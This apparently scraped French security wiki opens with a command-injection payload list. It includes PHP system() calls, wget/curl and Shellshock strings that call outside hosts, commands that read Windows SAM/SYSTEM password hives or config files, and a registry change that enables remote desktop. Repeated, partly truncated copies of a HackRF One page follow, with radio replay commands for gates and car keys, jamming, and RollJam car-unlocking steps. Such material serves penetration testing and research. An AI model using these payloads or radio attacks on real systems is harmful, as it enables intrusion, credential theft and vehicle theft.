<?php system("echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX");?>
<?php system("sleep 10");?>
<?php system("sleep 5");?>
<?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?>
<?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?req=jdfj2jc");?>
:phpversion();
`ping 127.0.0.1`
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
;${@print(md5(RCEVulnerable))};
${@print("RCEVulnerable")}
${@print(system($_SERVER['HTTP_USER_AGENT']))}
pwd
| pwd
; pwd
& pwd
&& pwd
\r
| reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
&& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
\r\n
route
| sleep 1
; sleep 1
& sleep 1
&& sleep 1
sleep 1
|| sleep 10
| sleep 10
; sleep 10
{${sleep(10)}}
& sleep 10
&& sleep 10
sleep 10
|| sleep 15
| sleep 15
; sleep 15
& sleep 15
&& sleep 15
{${sleep(20)}}
{${sleep(20)}}
{${sleep(3)}}
{${sleep(3)}}
| sleep 5
; sleep 5
& sleep 5
&& sleep 5
sleep 5
{${sleep(hexdec(dechex(20)))}}
{${sleep(hexdec(dechex(20)))}}
sysinfo
| sysinfo
; sysinfo
& sysinfo
&& sysinfo
system('cat C:\boot.ini');
system('cat config.php');
|| system('curl https://crowdshield.com/.testing/rce_vuln.txt');
| system('curl https://crowdshield.com/.testing/rce_vuln.txt');
; system('curl https://crowdshield.com/.testing/rce_vuln.txt');
& system('curl https://crowdshield.com/.testing/rce_vuln.txt');
&& system('curl https://crowdshield.com/.testing/rce_vuln.txt');
system('curl https://crowdshield.com/.testing/rce_vuln.txt')
system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf')
system('curl https://xerosecurity.com/.testing/rce_vuln.txt');
system('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
systeminfo
| systeminfo
; systeminfo
& systeminfo
&& systeminfo
system('ls')
system('pwd')
system('pwd');
|| system('sleep 5');
| system('sleep 5');
; system('sleep 5');
& system('sleep 5');
&& system('sleep 5');
system('sleep 5')
system('sleep 5');
system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23')
system('wget https://xerosecurity.com/.testing/rce_vuln.txt');
system('whoami')
system('whoami');
test*; ls -lhtR /var/www/
test* || perl -e 'print "X"x16096'
test* | perl -e 'print "X"x16096'
test* & perl -e 'print "X"x16096'
test* && perl -e 'print "X"x16096'
test*; perl -e 'print "X"x16096'
$(`type C:\boot.ini`)
&&type C:\\boot.ini
| type C:\Windows\repair\SAM
; type C:\Windows\repair\SAM
& type C:\Windows\repair\SAM
&& type C:\Windows\repair\SAM
type C:\Windows\repair\SAM
| type C:\Windows\repair\SYSTEM
; type C:\Windows\repair\SYSTEM
& type C:\Windows\repair\SYSTEM
&& type C:\Windows\repair\SYSTEM
type C:\Windows\repair\SYSTEM
| type C:\WINNT\repair\SAM
; type C:\WINNT\repair\SAM
& type C:\WINNT\repair\SAM
&& type C:\WINNT\repair\SAM
type C:\WINNT\repair\SAM
type C:\WINNT\repair\SYSTEM
| type %SYSTEMROOT%\repair\SAM
; type %SYSTEMROOT%\repair\SAM
& type %SYSTEMROOT%\repair\SAM
&& type %SYSTEMROOT%\repair\SAM
type %SYSTEMROOT%\repair\SAM
| type %SYSTEMROOT%\repair\SYSTEM
; type %SYSTEMROOT%\repair\SYSTEM
& type %SYSTEMROOT%\repair\SYSTEM
&& type %SYSTEMROOT%\repair\SYSTEM
type %SYSTEMROOT%\repair\SYSTEM
uname
;uname;
| uname -a
; uname -a
& uname -a
&& uname -a
uname -a
|/usr/bin/id
;|/usr/bin/id|
;/usr/bin/id|
$;/usr/bin/id
() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");'
() { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11
| wget http://crowdshield.com/.testing/rce.txt
& wget http://crowdshield.com/.testing/rce.txt
; wget https://crowdshield.com/.testing/rce_vuln.txt
$(`wget https://crowdshield.com/.testing/rce_vuln.txt`)
&& wget https://crowdshield.com/.testing/rce_vuln.txt
wget https://crowdshield.com/.testing/rce_vuln.txt
$(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
which curl
which gcc
which nc
which netcat
which perl
which python
which wget
whoami
| whoami
; whoami
' whoami
' || whoami
' & whoami
' && whoami
'; whoami
" whoami
" || whoami
" | whoami
" & whoami
" && whoami
"; whoami
$(`whoami`)
& whoami
&& whoami
{{ get_user_file("C:\boot.ini") }}
{{ get_user_file("/etc/hosts") }}
{{4+4}}
{{4+8}}
{{person.secret}}
{{person.name}}
{1} + {1}
{% For c in [1,2,3]%} {{c, c, c}} {% endfor%}
{{[] .__ Class __.__ base __.__ subclasses __ ()}}

== Références ==
*https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
*https://github.com/payloadbox/command-injection-payload-list
*https://book.hacktricks.xyz/pentesting-web/command-injection

Web:Injection de Commandes

2023-12-02T17:42:42Z

OldNeib : /* Références */

Web:Injection de Commandes

2023-12-02T17:38:24Z

OldNeib : /* ${SHELLOPTS} */

Web:Injection de Commandes

2023-12-02T17:37:55Z

OldNeib : Page créée avec « Lors de l'exécution d'une commande en ligne prenant en paramètre une entrée utilisateur, il est parfois possible de s'évader du champ d'action prévu par l'ajout de certains caractères: == Les Métacharacteres == ; | Le point-virgule est le métacaractère le plus couramment utilisé pour tester une faille d'injection. Le shell exécute toutes les commandes séparées par le point-virgule. & | Il sépare plusieurs commandes su... »

Tools:HackRF One

2023-12-02T16:08:15Z

OldNeib : /* Radio Jamming */

== HackRF One ==
Le HackRF One ([https://greatscottgadgets.com/hackrf/one/ Great Scott Gadgets]) est une radio définie par logiciel (SDR) capable d'émettre ou de recevoir des signaux radio de 1 MHz à 6 GHz.

Il a été conçu pour permettre le test et le développement de technologies radio modernes et de nouvelle génération.
Le HackRF One est un matériel open source qui peut être utilisée en tant que périphérique USB ou programmée pour un fonctionnement autonome.

*Fréquence de fonctionnement de 1 MHz à 6 GHz
*Émetteur-récepteur semi-duplex
*Jusqu'à 20 millions d'échantillons par seconde
*Échantillons en quadrature de 8 bits (8 bits I et 8 bits Q)
*Compatible avec GNU Radio, SDR#, etc.
*Gain RX et TX et filtre en bande de base configurables par logiciel
*Alimentation du port d'antenne contrôlée par logiciel (50 mA à 3,3 V)
*Connecteur d'antenne SMA femelle
*Entrée et sortie d'horloge SMA femelle pour la synchronisation
*Boutons pratiques pour la programmation
*En-têtes de broches internes pour l'expansion
*USB 2.0 haut débit
*alimenté par USB

=== Commandes ===
Hackrf_info : informations de version

Hackrf_transfer : capturer, transmettre

hackrf_debug : commande de debug du hackRF One

hackrf_sweep : balayer un champ de fréquences et l'analyser

hackrf_spiflash : mettre à jour le firmware

hackrf_cpldjtag : mettre à jour le cpld

== Installation ==
$ apt install hackrf

=== Mise à jour du micrologiciel ===
Les appareils HackRF sont livrés avec un micrologiciel sur la mémoire flash SPI. Le micrologiciel peut être mis à jour à l'aide d'un câble USB et d'un ordinateur hôte.

=== Mise à jour du SPI Flash Firmware ===
$ hackrf_spiflash -w hackrf_one_usb.bin

Vous pouvez trouver le binaire du firmware (hackrf_one_usb.bin) dans le répertoire firmware-bin de [https://github.com/mossmann/hackrf/releases/latest la dernière version] ou vous pouvez compiler le vôtre à partir [https://github.com/mossmann/hackrf/tree/master/firmware des sources]. Pour Jawbreaker, utilisez hackrf_jawbreaker_usb.bin. Si vous compilez à partir des sources, le fichier s'appellera hackrf_usb.bin.

Lorsque vous écrivez une image de micrologiciel sur la mémoire flash SPI, veillez à sélectionner un micrologiciel dont le nom de fichier se termine par .bin.

Après avoir écrit le micrologiciel sur la mémoire flash SPI, vous devrez peut-être réinitialiser le dispositif HackRF en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

Si vous obtenez une erreur mentionnant HACKRF_ERROR_NOT_FOUND, il s'agit souvent d'un problème de permissions dans votre système d'exploitation.

Pour vérifier si la mise à jour a été correctement installée:
$ hackrf_info
hackrf_info version: unknown
libhackrf version: unknown (0.5)
Found HackRF
Index: 0
Serial number: 000000000000000057b068dc22451163
Board ID Number: 2 (HackRF One)
Firmware Version: 2018.01.1 (API:1.02)
Part ID Number: 0xa000cb3c 0x00724357

=== Si nécessaire seulement: Récupération du SPI Flash Firmware ===
Si le firmware installé dans la mémoire flash SPI a été endommagé ou si vous programmez un HackRF fait maison pour la première fois, vous ne pourrez pas utiliser immédiatement le programme hackrf_spiflash comme indiqué dans la procédure ci-dessus.

Suivez plutôt les étapes suivantes :
*Suivez les instructions de démarrage DFU pour démarrer le HackRF en mode de démarrage DFU (DFU Boot).
*Tapez dfu-util --device 1fc9:000c --alt 0 --download hackrf_one_usb.dfu pour charger le micrologiciel d'une version dans la RAM. Si vous avez un Jawbreaker, utilisez hackrf_jawbreaker_usb.dfu à la place. Alternativement, utilisez make -e BOARD=HACKRF_ONE RUN_FROM=RAM pour charger le firmware en RAM et le démarrer.
*Suivez la procédure de mise à jour du micrologiciel SPI flash ci-dessus pour écrire l'image du micrologiciel .bin dans la mémoire flash SPI.

=== Si nécessaire seulement: DFU Boot ===
Le mode de démarrage DFU (DFU Boot) n'est normalement nécessaire que si le micrologiciel ne fonctionne pas correctement ou n'a jamais été installé.

Le microcontrôleur LPC4330 du HackRF est capable de démarrer à partir de plusieurs sources de code différentes. Par défaut, le HackRF One démarre à partir de la mémoire flash SPI (SPIFI). Il est également possible de démarrer le HackRF en mode DFU Boot (USB). En mode de démarrage DFU, le HackRF procède à une énumération via USB, attend que le code soit fourni à l'aide de la norme DFU (Device Firmware Update) via USB, puis exécute ce code à partir de la RAM. Le SPIFI est normalement inutilisé et non modifié en mode DFU.

Pour démarrer le HackRF One en mode DFU, maintenez le bouton DFU enfoncé tout en l'allumant ou en appuyant sur le bouton RESET et en le relâchant. Relâchez le bouton DFU lorsque le voyant 3V3 s'allume. Le voyant 1V8 doit rester éteint. À ce stade, le HackRF One est prêt à recevoir le micrologiciel par USB.

Pour démarrer le Jawbreaker en mode DFU, court-circuitez deux broches sur l'une des en-têtes "BOOT" lorsque l'alimentation est fournie pour la première fois. Les broches qui doivent être court-circuitées sont les broches 1 et 2 de l'en-tête P32 du Jawbreaker. L'en-tête P32 est étiqueté P2_8 sur la plupart des Jawbreaker mais peut être étiqueté 2 sur les prototypes. La broche 1 est étiquetée VCC. La broche 2 est la broche centrale. Après le démarrage DFU, vous devriez voir la LED VCC s'allumer et noter que la LED 1V8 ne s'allume pas. À ce stade, le Jawbreaker est prêt à recevoir un micrologiciel par USB.

Vous ne devez utiliser qu'une image de micrologiciel dont le nom de fichier se termine par .dfu, et non un micrologiciel se terminant par .bin.

=== Installer DFU-Util ===
$ apt install dfu-util

Depuis les [http://dfu-util.sourceforge.net/build.html sources]:
$ cd ~
$ sudo apt-get build-dep dfu-util
$ sudo apt-get install libusb-1.0-0-dev
$ git clone git://git.code.sf.net/p/dfu-util/dfu-util
$ cd dfu-util
$ ./autogen.sh
$ ./configure
$ make
$ sudo make install

=== Mise à jour du CPLD ===
Les anciennes versions du firmware du HackRF (prior to release 2021.03.1) nécessitent une étape supplémentaire pour programmer un flux binaire dans le CPLD.

Pour mettre à jour l'image du CPLD, mettez d'abord à jour le microprogramme flash SPI, libhackrf et hackrf-tools.

Ensuite :
$ hackrf_cpldjtag -x firmware/cpld/sgpio_if/default.xsvf

Trois LEDs devraient commencer à clignoter. Cela indique que le CPLD a été programmé avec succès.
Réinitialisez le dispositif en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

== Replay Attaque ==
=== Portail ===
Nous devons déterminer sur quelle fréquence la télécommande va communiquer (autours des 433Mhz).

Sur GQRX, nous allons pouvoir vérifier et ajuster notre fréquence d'écoute. Lorsque nous activons la télécommande, nous devons observer une variation du signal sur la fréquence écoutée.

==== Enregistrement ====
$ hackrf_transfer -s 2 -f 433000000 -r file

==== Émission ====
$ hackrf_transfer -s 2 -f 433000000 -t file -a 1 -x 24

==== Options ====
*-s : Taux d'echantillons en MHz
*-f : Fréquence exacte enregistrée ou diffusée en Hz
*-r : Nom du fichier à l'enregistrement
*-t : Nom du fichier à la lecture
*-a : Amplification
*-x : Gain entre 0 et 47 dB (en Décibel)
*-h : Pour le menu complet des options.

=== Talkie-walkie ===
Il s'agit exactement du même procédé vu ci-dessus pour les portail.

== Car Key Replay Attack ==
Pour ne pas que les voitures soit vulnérables à une attaque simple de Replay Attack, les constructeur ont équipé les nouvelles voitures d'un système de code roulant (rolling code system) chaque fois que vous appuyez sur le bouton de déverrouillage, la télécommande utilise un algorithme pour générer un nouveau code ce qui rend donc les ancien siganux inutilisables, un simple Replay Attack comme celui présenté ci-dessus n'est donc pas impossible.

=== Étude du signal avec URH ===
[https://github.com/jopohl/urh URH]

== Radio Jamming ==
Le jamming est une technique de brouillage visant à perturber les fréquences comportant des informations, en les submergeant avec du bruit. C'est le rapport signal sur bruit.

=== Jamming Car Key ===
En émettant du bruit sur la fréquence utilisé par une clé de voiture, le signal se retrouvera ainsi perdu et ne pourra ainsi pas être reconnu.

=== RollJam Attack ===
Méthodologie de l’attaque :
*Un brouillage radio est lancé sur la fréquence 433.92 qui est la fréquence de déverrouillage de notre voiture.
*La victime tente de déverrouiller une première fois la voiture en appuyant sur la clef, et donc en émettant un signal.
*Le signal est capturé et enregistré.
*La victime tente donc une deuxième fois de déverrouiller la voiture, toujours sans réussite.
*Le brouillage s’arrête et le premier signal est lancé ce qui déverrouille la voiture.

Le 2eme signal (Rolling Code) émis par la victime est enregistré. Comme la voiture a reçu uniquement le premier signal, le rolling code du second signal est donc valide, l'attaquant pourra donc déverrouiller la voiture par la suite.

=== Jamming Wifi ===

== Portapack ==

== SSTV ==

== Tempest SDR ==

== GPS Spoofing ==

== Références ==
*https://greatscottgadgets.com/hackrf/one/
*https://hackrf.readthedocs.io/en/latest/index.html
*https://github.com/PierreAdams/HackRF-One-French

Tools:HackRF One

2023-12-02T16:07:07Z

OldNeib : /* Si nécessaire seulement: DFU Boot */

== HackRF One ==
Le HackRF One ([https://greatscottgadgets.com/hackrf/one/ Great Scott Gadgets]) est une radio définie par logiciel (SDR) capable d'émettre ou de recevoir des signaux radio de 1 MHz à 6 GHz.

Il a été conçu pour permettre le test et le développement de technologies radio modernes et de nouvelle génération.
Le HackRF One est un matériel open source qui peut être utilisée en tant que périphérique USB ou programmée pour un fonctionnement autonome.

*Fréquence de fonctionnement de 1 MHz à 6 GHz
*Émetteur-récepteur semi-duplex
*Jusqu'à 20 millions d'échantillons par seconde
*Échantillons en quadrature de 8 bits (8 bits I et 8 bits Q)
*Compatible avec GNU Radio, SDR#, etc.
*Gain RX et TX et filtre en bande de base configurables par logiciel
*Alimentation du port d'antenne contrôlée par logiciel (50 mA à 3,3 V)
*Connecteur d'antenne SMA femelle
*Entrée et sortie d'horloge SMA femelle pour la synchronisation
*Boutons pratiques pour la programmation
*En-têtes de broches internes pour l'expansion
*USB 2.0 haut débit
*alimenté par USB

=== Commandes ===
Hackrf_info : informations de version

Hackrf_transfer : capturer, transmettre

hackrf_debug : commande de debug du hackRF One

hackrf_sweep : balayer un champ de fréquences et l'analyser

hackrf_spiflash : mettre à jour le firmware

hackrf_cpldjtag : mettre à jour le cpld

== Installation ==
$ apt install hackrf

=== Mise à jour du micrologiciel ===
Les appareils HackRF sont livrés avec un micrologiciel sur la mémoire flash SPI. Le micrologiciel peut être mis à jour à l'aide d'un câble USB et d'un ordinateur hôte.

=== Mise à jour du SPI Flash Firmware ===
$ hackrf_spiflash -w hackrf_one_usb.bin

Vous pouvez trouver le binaire du firmware (hackrf_one_usb.bin) dans le répertoire firmware-bin de [https://github.com/mossmann/hackrf/releases/latest la dernière version] ou vous pouvez compiler le vôtre à partir [https://github.com/mossmann/hackrf/tree/master/firmware des sources]. Pour Jawbreaker, utilisez hackrf_jawbreaker_usb.bin. Si vous compilez à partir des sources, le fichier s'appellera hackrf_usb.bin.

Lorsque vous écrivez une image de micrologiciel sur la mémoire flash SPI, veillez à sélectionner un micrologiciel dont le nom de fichier se termine par .bin.

Après avoir écrit le micrologiciel sur la mémoire flash SPI, vous devrez peut-être réinitialiser le dispositif HackRF en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

Si vous obtenez une erreur mentionnant HACKRF_ERROR_NOT_FOUND, il s'agit souvent d'un problème de permissions dans votre système d'exploitation.

Pour vérifier si la mise à jour a été correctement installée:
$ hackrf_info
hackrf_info version: unknown
libhackrf version: unknown (0.5)
Found HackRF
Index: 0
Serial number: 000000000000000057b068dc22451163
Board ID Number: 2 (HackRF One)
Firmware Version: 2018.01.1 (API:1.02)
Part ID Number: 0xa000cb3c 0x00724357

=== Si nécessaire seulement: Récupération du SPI Flash Firmware ===
Si le firmware installé dans la mémoire flash SPI a été endommagé ou si vous programmez un HackRF fait maison pour la première fois, vous ne pourrez pas utiliser immédiatement le programme hackrf_spiflash comme indiqué dans la procédure ci-dessus.

Suivez plutôt les étapes suivantes :
*Suivez les instructions de démarrage DFU pour démarrer le HackRF en mode de démarrage DFU (DFU Boot).
*Tapez dfu-util --device 1fc9:000c --alt 0 --download hackrf_one_usb.dfu pour charger le micrologiciel d'une version dans la RAM. Si vous avez un Jawbreaker, utilisez hackrf_jawbreaker_usb.dfu à la place. Alternativement, utilisez make -e BOARD=HACKRF_ONE RUN_FROM=RAM pour charger le firmware en RAM et le démarrer.
*Suivez la procédure de mise à jour du micrologiciel SPI flash ci-dessus pour écrire l'image du micrologiciel .bin dans la mémoire flash SPI.

=== Si nécessaire seulement: DFU Boot ===
Le mode de démarrage DFU (DFU Boot) n'est normalement nécessaire que si le micrologiciel ne fonctionne pas correctement ou n'a jamais été installé.

Le microcontrôleur LPC4330 du HackRF est capable de démarrer à partir de plusieurs sources de code différentes. Par défaut, le HackRF One démarre à partir de la mémoire flash SPI (SPIFI). Il est également possible de démarrer le HackRF en mode DFU Boot (USB). En mode de démarrage DFU, le HackRF procède à une énumération via USB, attend que le code soit fourni à l'aide de la norme DFU (Device Firmware Update) via USB, puis exécute ce code à partir de la RAM. Le SPIFI est normalement inutilisé et non modifié en mode DFU.

Pour démarrer le HackRF One en mode DFU, maintenez le bouton DFU enfoncé tout en l'allumant ou en appuyant sur le bouton RESET et en le relâchant. Relâchez le bouton DFU lorsque le voyant 3V3 s'allume. Le voyant 1V8 doit rester éteint. À ce stade, le HackRF One est prêt à recevoir le micrologiciel par USB.

Pour démarrer le Jawbreaker en mode DFU, court-circuitez deux broches sur l'une des en-têtes "BOOT" lorsque l'alimentation est fournie pour la première fois. Les broches qui doivent être court-circuitées sont les broches 1 et 2 de l'en-tête P32 du Jawbreaker. L'en-tête P32 est étiqueté P2_8 sur la plupart des Jawbreaker mais peut être étiqueté 2 sur les prototypes. La broche 1 est étiquetée VCC. La broche 2 est la broche centrale. Après le démarrage DFU, vous devriez voir la LED VCC s'allumer et noter que la LED 1V8 ne s'allume pas. À ce stade, le Jawbreaker est prêt à recevoir un micrologiciel par USB.

Vous ne devez utiliser qu'une image de micrologiciel dont le nom de fichier se termine par .dfu, et non un micrologiciel se terminant par .bin.

=== Installer DFU-Util ===
$ apt install dfu-util

Depuis les [http://dfu-util.sourceforge.net/build.html sources]:
$ cd ~
$ sudo apt-get build-dep dfu-util
$ sudo apt-get install libusb-1.0-0-dev
$ git clone git://git.code.sf.net/p/dfu-util/dfu-util
$ cd dfu-util
$ ./autogen.sh
$ ./configure
$ make
$ sudo make install

=== Mise à jour du CPLD ===
Les anciennes versions du firmware du HackRF (prior to release 2021.03.1) nécessitent une étape supplémentaire pour programmer un flux binaire dans le CPLD.

Pour mettre à jour l'image du CPLD, mettez d'abord à jour le microprogramme flash SPI, libhackrf et hackrf-tools.

Ensuite :
$ hackrf_cpldjtag -x firmware/cpld/sgpio_if/default.xsvf

Trois LEDs devraient commencer à clignoter. Cela indique que le CPLD a été programmé avec succès.
Réinitialisez le dispositif en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

== Replay Attaque ==
=== Portail ===
Nous devons déterminer sur quelle fréquence la télécommande va communiquer (autours des 433Mhz).

Sur GQRX, nous allons pouvoir vérifier et ajuster notre fréquence d'écoute. Lorsque nous activons la télécommande, nous devons observer une variation du signal sur la fréquence écoutée.

==== Enregistrement ====
$ hackrf_transfer -s 2 -f 433000000 -r file

==== Émission ====
$ hackrf_transfer -s 2 -f 433000000 -t file -a 1 -x 24

==== Options ====
*-s : Taux d'echantillons en MHz
*-f : Fréquence exacte enregistrée ou diffusée en Hz
*-r : Nom du fichier à l'enregistrement
*-t : Nom du fichier à la lecture
*-a : Amplification
*-x : Gain entre 0 et 47 dB (en Décibel)
*-h : Pour le menu complet des options.

=== Talkie-walkie ===
Il s'agit exactement du même procédé vu ci-dessus pour les portail.

== Car Key Replay Attack ==
Pour ne pas que les voitures soit vulnérables à une attaque simple de Replay Attack, les constructeur ont équipé les nouvelles voitures d'un système de code roulant (rolling code system) chaque fois que vous appuyez sur le bouton de déverrouillage, la télécommande utilise un algorithme pour générer un nouveau code ce qui rend donc les ancien siganux inutilisables, un simple Replay Attack comme celui présenté ci-dessus n'est donc pas impossible.

=== Étude du signal avec URH ===
[https://github.com/jopohl/urh URH]

== Radio Jamming ==
Le jamming est une technique de brouillage visant à perturber les fréquences comportant des informations, en les submergeant avec du bruit. C'est le rapport signal sur bruit.

=== Jamming Car Key ===
En émettant du bruit sur la fréquence utilisé par une clé de voiture, le signal se retrouvera ainsi perdu et ne pourra ainsi pas être reconnu.

=== RollJam Attack ===
Méthodologie de l’attaque :
*Un brouillage radio est lancé sur la fréquence 433.92 qui est la fréquence de déverrouillage de notre voiture.
*La victime tente de déverrouiller une première fois la voiture en appuyant sur la clef, et donc en émettant un signal.
*Le signal est capturé et enregistré.
*La victime tente donc une deuxième fois de déverrouiller la voiture, toujours sans réussite.
*Le brouillage s’arrête et le premier signal est lancé ce qui déverrouille la voiture.

Le 2eme signal (Rolling Code) émis par la victime est enregistré. Comme la voiture a reçu uniquement le premier signal, le rolling code du second signal est donc valide, l'attaquant pourra donc déverrouiller la voiture par la suite.

=== Jamming Wifi ===

== Portapack ==

== SSTV ==

== Tempest SDR ==

== GPS Spoofing ==

== Références ==
*https://greatscottgadgets.com/hackrf/one/
*https://hackrf.readthedocs.io/en/latest/index.html
*https://github.com/PierreAdams/HackRF-One-French

Tools:HackRF One

2023-12-02T16:06:20Z

OldNeib : /* Installation */

== HackRF One ==
Le HackRF One ([https://greatscottgadgets.com/hackrf/one/ Great Scott Gadgets]) est une radio définie par logiciel (SDR) capable d'émettre ou de recevoir des signaux radio de 1 MHz à 6 GHz.

Il a été conçu pour permettre le test et le développement de technologies radio modernes et de nouvelle génération.
Le HackRF One est un matériel open source qui peut être utilisée en tant que périphérique USB ou programmée pour un fonctionnement autonome.

*Fréquence de fonctionnement de 1 MHz à 6 GHz
*Émetteur-récepteur semi-duplex
*Jusqu'à 20 millions d'échantillons par seconde
*Échantillons en quadrature de 8 bits (8 bits I et 8 bits Q)
*Compatible avec GNU Radio, SDR#, etc.
*Gain RX et TX et filtre en bande de base configurables par logiciel
